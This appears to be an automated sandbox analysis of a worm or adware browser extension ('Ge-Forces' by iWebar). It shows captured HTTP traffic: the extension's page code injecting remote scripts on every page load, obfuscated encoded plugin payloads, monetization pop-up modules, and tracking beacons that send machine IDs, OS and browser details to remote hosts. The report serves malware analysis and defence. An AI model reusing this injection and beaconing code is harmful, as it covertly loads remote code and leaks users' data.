Content-Length: 39
Server: thin 1.4.1 codename Chromeo
Via: 1.1 vegur
{"country_code":38,"country_name":"CA"}
GET /plugin/apps/69129/js/na/ie/app_code.js?ver=27&rnd=1521 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsdemosrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:23 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1420713929"
Last-Modified: Thu, 08 Jan 2015 10:45:29 GMT
Cache-Control: max-age=651
Content-Length: 15858
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1421058083.dop002.ny2.t,1421058083.cds044.ny2.c
.. /************************************************************************************. This is your Page Code. The appAPI.ready() code block will be executed on every page load.. For more information please visit our docs site: hXXp://docs.crossrider.com.*************************************************************************************/.HOST = "hXXp://wt.iwebar.com";.TOOLBAR_URL = HOST + '/js/toolbar.js';..AFFILIATE_ID = 'NONE';...appAPI.ready(function($) {.../*..if (appAPI.db.get('user_id') === null) {...if (appAPI.db.get('installation') === null){....appAPI.db.set('installation', new Date().getTime());....return;...}...else {....if ((new Date().getTime() - appAPI.db.get('installation')) < 1000 * 60 * 60 * 48){.....//No need to display toolbar... hasn't been 2 days yet......return;....} ...}..}*/...console.log("=======> Extension [version: " + appAPI.appInfo.version + "] loading...");....// Set the affiliate ID. //appAPI.db.set('affiliate_id', AFFILIATE_ID);...// Include the Base64 library..appAPI.resources.includeJS('jquery.base64.js');..appAPI.resources.includeJS('jquery-1.10.2.min.js');..appAPI.resources.includeJS('md5.js');..//appAPI.resources.includeJS('i2v.js');....appAPI.resources.includeJS('jw_whitelist_1.js');..appAPI.resources.includeJS('jw_whitelist_2.js');..appAPI.dom.addRemoteJS('hXXp://wt.iwebar.com/js/jw_whitelist_3.js');.....var pObj = sendReport();..../** Custom injections **/..appAPI.resources.includeJS('askcom.js');..function customInjections(country) {...try {....// Ask.co
<<< skipped >>>
GET /plugin/apps/69129/plugins/na/ie/plugins.json?ver=23&rnd=5437 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsdemosrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:23 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1420713930"
Last-Modified: Thu, 08 Jan 2015 10:45:30 GMT
Cache-Control: max-age=652
Content-Length: 17999
Content-Type: text/plain; charset=UTF-8
X-HW: 1421058083.dop002.ny2.t,1421058083.cds051.ny2.c
{.."plugins_version": 23,.."plugins_list":. [. {"id":1,"url":"hXXp://js.newstatsdemosrv.com/plugins/mins/1.js","ver":11,"name":"base","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":false,"px":false},"targets":[{"run_at":1,"order":10400},{"run_at":2,"order":10400}],"enabled":true},{"id":4,"url":"hXXp://js.newstatsdemosrv.com/plugins/javascripts/jquery-1_7_1_min.js","ver":5,"name":"jquery_1_7_1","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"targets":[{"run_at":1,"order":10200},{"run_at":0,"order":100},{"run_at":5,"order":100},{"run_at":2,"order":10200}],"enabled":true},{"id":2,"url":"hXXp://js.newstatsdemosrv.com/plugins/mins/2.js","ver":2,"name":"ie8_fix_1","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targets":[{"run_at":1,"order":10100},{"run_at":2,"order":10100}],"enabled":true},{"id":3,"url":"hXXp://js.newstatsdemosrv.com/plugins/mins/3.js","ver":2,"name":"ie8_fix_2","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targets":[{"run_at":1,"order":10300},{"run_at":2,"order":10300}],"enabled":true},{"id":28,"url":"hXXp://js.newstatsdemosrv.com/plugins/mins/28.js","ver":4,"name":"initializer","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":false,"px":false},"targets":[{"run_at":1,"order":999999999},{"run_at":2,"order":999999999}],"enabled":true},{"id":21,"url":"http://js.newstatsdemosrv.com/plugins/mins/21.js","ver":5,"name":"debug","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":false,"p
<<< skipped >>>
GET /plugins/mins/356.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsdemosrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:23 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1418564745"
Last-Modified: Sun, 14 Dec 2014 13:45:45 GMT
Cache-Control: max-age=20
Content-Length: 407
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1421058083.dop002.ny2.t,1421058083.cds012.ny2.c
appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[356]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(356,["pops"])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:"MAN"}))();};....
GET /plugins/mins/193.js?ver=9&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsdemosrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:24 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1408273131"
Last-Modified: Sun, 17 Aug 2014 10:58:51 GMT
Cache-Control: max-age=804
Content-Length: 867
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1421058084.dop002.ny2.t,1421058084.cds009.ny2.c
if (typeof setup2 === 'function') { setup2('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', 'fhsakzfpmp'); }....
GET /plugins/mins/288.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsdemosrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:23 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1404660469"
Last-Modified: Sun, 06 Jul 2014 15:27:49 GMT
Cache-Control: max-age=451
Content-Length: 551
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1421058083.dop002.ny2.t,1421058083.cds004.ny2.c
if (typeof setup2 === 'function') { setup2('MTg2ZTU3NDU1MTRiNGQwZTBlMDMxMzMxMDUwOTUzNTE0ZjQ0MTIwMzE3MTQ0ZDRhNWUwMjFjMTIxYjAzMGEwNzU5MDExMDFmMGUwMDFiMDQxNzAzMDIxNzA0NDUwNjA4MWMxODRjMDIxODRhMWMwMjAxNDkxOTA1MTIwNzU5MGYwMjU0MDcwZjFlNGEzYzNiMzQzNzNlMzgzYzM0MzMzMzI2MzYyODMwMjIyZTNkMzkzMzMzM2MzYjUxMDcxZjBhMDIwMzQ3MjgzYzI3MjUyYTIyMzgzZDJmM2UzMjMxM2IzNjM1MjEzNDIxMjczNzMyM2MzYjUxMTYwNDA5MDYwMjQ3MjgzYzI3MjUyYTIyMzgzZDJmM2UzMjMxM2IzMjNkMjUyZTIxMjIzZjMzM2MzNzIyMjcyZTIyMmIzOTI1NTU0ZjZlNTc0NTUxNGI0ZDE2MTYwMjA0MGQxOTJjMTU0OTU1NDY0ODRmNWI2ZTBh', 'cdweqkofzw'); }....
GET /plugins/mins/184.js?ver=11&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsdemosrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:24 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1420026483"
Last-Modified: Wed, 31 Dec 2014 11:48:03 GMT
Cache-Control: max-age=205
Content-Length: 1231
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1421058084.dop002.ny2.t,1421058084.cds013.ny2.c
if (typeof setup2 === 'function') { setup2('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', 'yayzflpgyo'); }..
<<< skipped >>>
GET /stats.gif?action=daily&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039418&lifetime=15&rnd=6909 HTTP/1.1
Accept: */*
Host: stats.newstatsclientcloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: qMg0Euses8OGBO03Gf2RtEI4hB2UE6umJ6UcUQCqMJkI7rL4hUOZpdc3VYKbg/B
x-amz-request-id: 00E59B0A66C91640
Date: Mon, 12 Jan 2015 10:21:28 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Feb 2014 00:10:58 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;..
GET /plugins/mins/262.js?ver=2&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsdemosrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:24 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1411293488"
Last-Modified: Sun, 21 Sep 2014 09:58:08 GMT
Cache-Control: max-age=783
Content-Length: 1075
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1421058084.dop005.ny2.t,1421058084.cds045.ny2.c
if (typeof setup2 === 'function') { setup2('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', 'dkragwefft'); }....
GET /plugins/mins/350.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsdemosrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:23 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1417707239"
Last-Modified: Thu, 04 Dec 2014 15:33:59 GMT
Cache-Control: max-age=694
Content-Length: 1799
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1421058083.dop005.ny2.t,1421058083.cds012.ny2.c
if (typeof setup2 === 'function') { setup2('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
<<< skipped >>>
GET /plugins/mins/337.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsdemosrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:24 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1417094308"
Last-Modified: Thu, 27 Nov 2014 13:18:28 GMT
Cache-Control: max-age=675
Content-Length: 407
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1421058084.dop005.ny2.t,1421058084.cds002.ny2.c
appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[337]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(337,["pops"])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:"TEN"}))();};....
GET /plugins/mins/91.js?ver=118&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsdemosrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:24 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1421049626"
Last-Modified: Mon, 12 Jan 2015 08:00:26 GMT
Cache-Control: max-age=50
Content-Length: 185222
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1421058084.dop005.ny2.t,1421058084.cds002.ny2.c
(function(M){var A=[].slice;var z={};var a=function(ar){if(typeof ar=="string"&&typeof ar.trim=="function"){return ar.trim();}return ar==null?"":ar.toString().replace(/^\s+/,"").replace(/\s+$/,"");};function f(ar){var at=z[ar]={},au,av;ar=ar.split(/\s+/);for(au=0,av=ar.length;au<av;au++){at[ar[au]]=true;}return at;}var H=function(ar,at){var av=[];for(var au=0;au<ar.length;au++){if(au in ar){var aw=at(ar[au],au,ar);if(aw!=null){av.push(aw);}}}return av;};var ad=function(av,ay,au){var at,aw=0,ax=av.length,ar=ax===undefined||appAPI.utils.isFunction(av);if(au){if(ar){for(at in av){if(ay.apply(av[at],au)===false){break;}}}else{for(;aw<ax;){if(ay.apply(av[aw++],au)===false){break;}}}}else{if(ar){for(at in av){if(ay.call(av[at],at,av[at])===false){break;}}}else{for(;aw<ax;){if(ay.call(av[aw],aw,av[aw++])===false){break;}}}}return av;};var J=function(au){au=au?(z[au]||f(au)):{};var az=[],aA=[],av,aw,at,ax,ay,aC=function(aD){var aE,aH,aG,aF,aI;for(aE=0,aH=aD.length;aE<aH;aE++){aG=aD[aE];aF=appAPI.utils.isArray(aG)?"array":(appAPI.utils.isFunction(aG)?"function":"");if(aF==="array"){aC(aG);}else{if(aF==="function"){if(!au.unique||!aB.has(aG)){az.push(aG);}}}}},ar=function(aE,aD){aD=aD||[];av=!au.memory||[aE,aD];aw=true;ay=at||0;at=0;ax=az.length;for(;az&&ay<ax;ay++){if(az[ay].apply(aE,aD)===false&&au.stopOnFalse){av=true;break;}}aw=false;if(az){if(!au.once){if(aA&&aA.length){av=aA.shift();aB.fireWith(av[0],av[1]);}}else{if(av===true){aB.disable();}else{az=[];}}}},aB={add:function(){if(az){var aD=az.leng
<<< skipped >>>
GET /monetization.gif?event=3&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403 HTTP/1.1
Host: logs.newstatsclientcloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:18 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1421058078.dop007.ny2.t,1421058078.cds053.ny2.c
GIF89a.............,...........D..;..
GET /plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=27&rnd=8405 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsclientcloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:28 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1420713954"
Last-Modified: Thu, 08 Jan 2015 10:45:54 GMT
Cache-Control: max-age=895
Content-Length: 1679
Content-Type: text/xml; charset=UTF-8
X-HW: 1421058088.dop005.ny2.t,1421058088.cds005.ny2.c
<?xml version="1.0" encoding="UTF-8"?>.<CrAppInfo>. <Ver>27</Ver>. <ShortName>Ge-Forces 1.1</ShortName>. <Description>Ge-Force</Description>. <PublisherName>iWebar</PublisherName>. <HomePageLink>NA</HomePageLink>. <JSLink>hXXp://js.newstatsdemosrv.com/plugin/apps/69129/js/na/ie/app_code.js</JSLink>. <GroupID>0</GroupID>. <Domain>NA</Domain>. <RunInIframe>false</RunInIframe>. <ThanksURL>NA</ThanksURL>. <EmailSignature>NA</EmailSignature>. <SettingsURL>NA</SettingsURL>. <CertifiedInstall>NA</CertifiedInstall>. <ExposeSites>NA</ExposeSites>. <RemoteFBApiURL>NA</RemoteFBApiURL>. <DisableIE>true</DisableIE>. <DisableFF>true</DisableFF>. <EnableSearchIE>false</EnableSearchIE>. <EnableSearchFF>false</EnableSearchFF>. <AddressbarIE>NA</AddressbarIE>. <AddressbarFF>NA</AddressbarFF>. <AddressbarFFEnhanced>NA</AddressbarFFEnhanced>. <AddressbarCR>NA</AddressbarCR>. <NewTabURL>NA</NewTabURL>. <NewTabEmbed>NA</NewTabEmbed>. <OpenSearchURL>NA</OpenSearchURL>. <BackgroundJS>hXXp://js.newstatsdemosrv.com/plugin/apps/69129/bg/na/ie/bg_code.js</BackgroundJS>. <BackgroundVer>1</BackgroundVer>. <Manifest>NA</Manifest>. <ChangePrevious>false&
<<< skipped >>>
GET /plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=9&rnd=7431 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsclientcloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:23 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1420713954"
Last-Modified: Thu, 08 Jan 2015 10:45:54 GMT
Cache-Control: max-age=900
Content-Length: 1679
Content-Type: text/xml; charset=UTF-8
X-HW: 1421058083.dop006.ny2.t,1421058083.cds005.ny2.pr
<?xml version="1.0" encoding="UTF-8"?>.<CrAppInfo>. <Ver>27</Ver>. <ShortName>Ge-Forces 1.1</ShortName>. <Description>Ge-Force</Description>. <PublisherName>iWebar</PublisherName>. <HomePageLink>NA</HomePageLink>. <JSLink>hXXp://js.newstatsdemosrv.com/plugin/apps/69129/js/na/ie/app_code.js</JSLink>. <GroupID>0</GroupID>. <Domain>NA</Domain>. <RunInIframe>false</RunInIframe>. <ThanksURL>NA</ThanksURL>. <EmailSignature>NA</EmailSignature>. <SettingsURL>NA</SettingsURL>. <CertifiedInstall>NA</CertifiedInstall>. <ExposeSites>NA</ExposeSites>. <RemoteFBApiURL>NA</RemoteFBApiURL>. <DisableIE>true</DisableIE>. <DisableFF>true</DisableFF>. <EnableSearchIE>false</EnableSearchIE>. <EnableSearchFF>false</EnableSearchFF>. <AddressbarIE>NA</AddressbarIE>. <AddressbarFF>NA</AddressbarFF>. <AddressbarFFEnhanced>NA</AddressbarFFEnhanced>. <AddressbarCR>NA</AddressbarCR>. <NewTabURL>NA</NewTabURL>. <NewTabEmbed>NA</NewTabEmbed>. <OpenSearchURL>NA</OpenSearchURL>. <BackgroundJS>hXXp://js.newstatsdemosrv.com/plugin/apps/69129/bg/na/ie/bg_code.js</BackgroundJS>. <BackgroundVer>1</BackgroundVer>. <Manifest>NA</Manifest>. <ChangePrevious>false&
<<< skipped >>>
Map
The Worm connects to the servers at the following location(s):
Strings from Dumps
Explorer.EXE_2032_rwx_00E70000_00002000:
SHELL32.DLL
SHELL32.DLL
ShellExecuteA
ShellExecuteA
KERNEL32.DLL
KERNEL32.DLL
.rsrc
.rsrc
.text
.text
Explorer.EXE_2032_rwx_00E80000_00001000:
|explorer.exeM_2032_
|explorer.exeM_2032_